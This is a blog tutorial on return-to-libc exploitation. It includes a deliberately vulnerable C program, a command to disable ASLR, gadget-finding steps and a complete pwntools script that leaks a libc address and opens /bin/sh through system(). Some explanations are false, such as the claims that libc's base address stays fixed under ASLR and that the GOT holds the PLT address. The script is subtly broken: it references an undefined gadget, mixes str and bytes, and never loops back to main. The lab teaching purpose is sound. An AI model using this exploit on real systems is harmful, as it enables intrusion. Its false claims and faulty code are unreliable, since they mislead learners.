Binary Exploitation Series

Introduction

Welcome to the fascinating world of binary exploitation, where we delve into the intricate art of manipulating computer programs to gain unauthorized access, uncover vulnerabilities, and expand our understanding of software security. In this blog post, we’ll embark on a journey into the technique known as “return to libc,” a classic method employed by exploit developers to bypass security mechanisms and gain control of a vulnerable program.

As technology advances, so do the complexities and challenges associated with securing software systems. To ensure robustness, developers implement various defense mechanisms, such as address space layout randomization (ASLR), stack canaries, and non-executable stack (NX). However, even the most fortified applications can sometimes possess vulnerabilities that clever attackers can exploit.

At its core, “return to libc“ is a technique used to bypass these security measures by manipulating the program’s control flow and leveraging existing functions within the C library (libc) to achieve arbitrary code execution. This technique relies on the fact that the C library is loaded into the memory space of every executable, making it a valuable resource for attackers seeking to execute code in the context of the exploited program.

The beauty of return to libc lies in its ability to evade the security mechanisms mentioned earlier. ASLR, for example, randomizes the memory locations of key program components, making it harder for attackers to predict addresses accurately. However, the C library’s base address remains constant across different runs of the same program, allowing us to locate and utilize its functions reliably.

/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

Exploiting “return to libc“ allows an attacker to achieve various malicious objectives. Here are a few examples:

  • Execute Arbitrary Shell Commands: By redirecting the control flow to the system() function from the C library, an attacker can execute arbitrary shell commands within the context of the exploited program. This provides them with unauthorized access and control over the system, enabling them to perform actions like modifying files, stealing data, or even launching further attacks.
  • Privilege Escalation: If the exploited program runs with elevated privileges, such as running as a privileged user or setuid binary, an attacker can leverage “return to libc” to escalate their privileges. By executing functions like setuid() or execve() from the C library, the attacker can gain higher privileges, enabling them to perform actions that would otherwise be restricted.
  • Bypass Security Mechanisms: “Return to libc” can be used to bypass various security mechanisms implemented by the operating system or the compiler. For example, if the program is protected with address space layout randomization (ASLR), which randomizes the memory addresses, an attacker can still determine the address of the C library functions since they are loaded at a predictable base address. Similarly, stack canaries, which aim to detect stack-based buffer overflows, can be bypassed by avoiding the overwrite of the canary value and instead redirecting the control flow to the C library functions.

Steps in order to achieve a full return to libc chain payload:

  • the padding until we begin to overwrite the RIP ( instruction pointer )
  • a pop rdi gadget that allows you to pop a value from the stack into the rdi register, which is commonly used for passing the first argument to functions in the x86-64 calling convention. You can search for such gadgets using tools like ROPgadget or by analyzing the binary with tools like objdump or Ghidra.
  • Locate the puts@plt entry: The puts@plt entry is the address of the PLT (Procedure Linkage Table) entry for the puts() function. The PLT is a mechanism used for dynamic function resolution in the binary. You can find the address of puts@plt by examining the binary with tools like objdump or Ghidra.
  • Locate the puts@got entry: The puts@got entry is the Global Offset Table (GOT) entry for the puts() function. The GOT stores the actual addresses of dynamically linked functions. You can find the address of puts@got by examining the binary with tools like objdump or Ghidra.
  • Execute the payload: Send the payload to the vulnerable program, triggering the exploitation process. The payload should cause the program to execute the pop rdi gadget, which will load the puts@got address into rdi, and then call puts@plt to print the leaked address.
  • Extract the leaked libc address: Once the program is executed, it will print the leaked address of the puts() function from the GOT. This address can be used to calculate the base address of the loaded libc library by subtracting the offset of puts() in libc. With the libc base address, you can find other libc functions for further exploitation.

How does the leak work

The leak works by taking advantage of the Global Offset Table (GOT) and the Procedure Linkage Table (PLT) entries in the binary, along with a pop rdi gadget, to obtain the address of the puts() function from the libc library.

  1. GOT Entry for puts(): The GOT is a table that holds the addresses of dynamically linked functions. When a function from an external library, such as puts(), is called, the program resolves the address from the GOT. Initially, the GOT entry for puts() contains the address of the corresponding entry in the PLT.
  2. PLT Entry for puts(): The Procedure Linkage Table (PLT) is a mechanism used for dynamic function resolution. The PLT entry for puts() is a small piece of code responsible for looking up and resolving the actual address of the puts() function in the libc library.
  3. pop rdi gadget: A pop rdi gadget is a sequence of instructions in the binary that pops a value from the stack into the rdi register. The rdi register is commonly used for passing the first argument to functions in the x86-64 calling convention.
  4. Crafting the Payload: The payload is crafted by constructing a sequence of addresses and instructions. It typically starts with the address of the pop rdi gadget, followed by the address of the puts@got entry, and finally, the address of the puts@plt entry.
  5. Execution of the Payload: When the vulnerable program executes the crafted payload, it first encounters the pop rdi gadget. This instruction pops the next value from the stack into the rdi register, which is the address of the puts@got entry.
  6. Calling puts@plt: After the pop rdi gadget, the execution flow reaches the address of the puts@plt entry. The code at this address transfers control to the PLT entry for puts(), which resolves and jumps to the actual address of the puts() function in libc.
  7. Printing the Leaked Address: The puts() function is called with the address of the puts@got entry in the rdi register. Since the puts@got entry initially contains the address of the corresponding PLT entry, puts() will print this address. This address represents the leaked libc address.

Finding the Padding

The fastest way to find the padding is by using gdb-peda which haves a function called pattern create that will generate a string based on a lenght.
After we have created the cyclic pattern we can type r in order to start the program. When the program asks for the user input just paste the pattern and press ENTER

We can see that the program crashed at 0x00005555555551ac in vuln()
Using the command pattern search , it will search in the registers for the pattern.

Using the Information

Using this information we can see that in order to overwrite the RSP register ( stack pointer ) we need to give it 104 random bytes. Knowing this is a 64 bit architecture the offset to the RIP should be RSP+8.
This means that the next 8 bytes after the 104 offset will overwrite the instruction pointer.

Find a rdi gadget

This process is quiet simple because there are some tools that will automatically find the gadgets for us: https://github.com/JonathanSalwan/ROPgadget

python3 ROPGadget.py --binary ./vuln 

Putting it Together

In order to test this we will create a script in python using pwntools ( https://docs.pwntools.com/en/stable/install.html )
The pwntools library is a powerful and widely used Python library designed for binary exploitation, particularly in the context of Capture The Flag (CTF) competitions and exploit development. It provides a comprehensive set of tools and utilities to assist in various stages of exploit development, including remote communication, payload generation, and exploitation techniques.

from pwn import *
#context.log_level='DEBUG'

p = process("./vuln")
elf = ELF("./vuln", checksec=False)
libc = elf.libc
rop = ROP(elf)

def start():
	if not args.REMOTE:
		return process("./vuln")
	else:
		return remote("localhost", 1337)

p = start()

def main():

	global rop

	pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0]
	puts_got = elf.got['puts']
	puts_plt = elf.plt['puts']
	main = elf.symbols['main']

	payload = b""
	payload += b"A"*104
	payload += p64(pop_rdi)
	payload += p64(puts_got)
	payload += p64(puts_plt)

	p.sendline(payload)

	p.recvline()
	p.recvline()

	leaked_puts = u64(p.recvline().strip().ljust(8, "\x00"))
	log.info("puts@leak: " + hex(leaked_puts))

	libc.address = leaked_puts - libc.symbols['puts']
	system = libc.symbols['system']
	bin_sh = next(libc.search(b"/bin/sh"))

	payload = b""
	payload += b"A"*104
	payload += p64(ret)
	payload += p64(pop_rdi)
	payload += p64(bin_sh)
	payload += p64(system)

	p.sendline(payload)

	p.interactive()

if __name__=="__main__":
	main()

Explanation

  1. Leak the Address of puts(): The exploit begins by constructing a payload. It starts with a buffer overflow, filling 104 bytes of padding followed by the address of a pop rdi gadget. This gadget will load the next value from the stack into the rdi register. The payload then includes the address of the puts@got entry (the Global Offset Table entry for the puts() function) and the address of the puts@plt entry (the Procedure Linkage Table entry for puts()). This payload is sent to the vulnerable program.

  2. Retrieve the Leaked Address: After sending the payload, the program receives three lines of output. The third line contains the leaked address of puts() from the GOT. The code captures this value, converts it to an integer, and calculates the base address of the libc library by subtracting the offset of puts() in libc.

  3. Calculate Addresses: Using the leaked libc base address, the exploit computes the addresses of the system() and /bin/sh strings in libc. These addresses are required to execute shell commands.

  4. Construct the Final Payload: The payload is constructed similarly to before, with a buffer overflow and padding. It includes a pop rdi gadget, the address of /bin/sh, and the address of system().

  5. Send the Final Payload: The payload is sent to the vulnerable program, which causes it to execute the system("/bin/sh") command, providing a shell with escalated privileges.

  6. Interactive Shell: Finally, the exploit enters an interactive shell, allowing the user to interact with the compromised system.

In conclusion, “return to libc” exploitation is a powerful technique that allows attackers to leverage the functionality of libc functions to achieve their malicious objectives. By redirecting the control flow to the C library, attackers can execute arbitrary shell commands, escalate privileges, bypass security mechanisms, and even achieve remote code execution.

Remember, the goal is not only to understand and exploit vulnerabilities but also to contribute to a safer digital landscape. By sharing knowledge, collaborating, and working together, we can collectively raise the bar on software security and protect against potential threats.

So, let’s continue to learn, innovate, and make a positive impact in the world of cybersecurity. Together, we can build resilient systems and stay one step ahead of those who seek to compromise them.